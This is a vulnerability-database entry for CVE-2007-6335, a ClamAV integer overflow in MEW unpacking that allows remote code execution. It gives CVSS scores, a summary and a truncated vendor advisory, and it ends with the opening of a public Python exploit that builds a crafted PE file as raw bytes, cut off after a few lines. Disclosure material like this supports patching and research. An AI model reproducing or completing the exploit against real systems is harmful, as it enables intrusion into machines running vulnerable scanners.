CVE-2007-6335

Published: 20/12/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Integer overflow in libclamav in ClamAV prior to 0.92 allows remote malicious users to execute arbitrary code via a crafted MEW packed PE file, which triggers a heap-based buffer overflow.

Vulnerable Product

clam anti-virus clamav

Vendor Advisories

Several remote vulnerabilities have been discovered in the Clam anti-virus toolkit. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-6335: It was discovered that an integer overflow in the decompression code for MEW archives may lead to the execution of arbitrary code.

CVE-2007-6336: It was dis ...

Exploits

'''
clamav-0.91.2 exploit ( CVE-2007-6335 )
(c) Thomas Pollet thomaspollet@gmail.com

we own dsize in read(desc, src + dsize, exe_sections[i + 1].rsz)) != exe_sections[i + 1].rsz)
exploited with randomize_va_space = 0
'''
import struct
exe=(
"\x4d\x5a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4c\x01\x02\x00"
"\x00\x00\x ...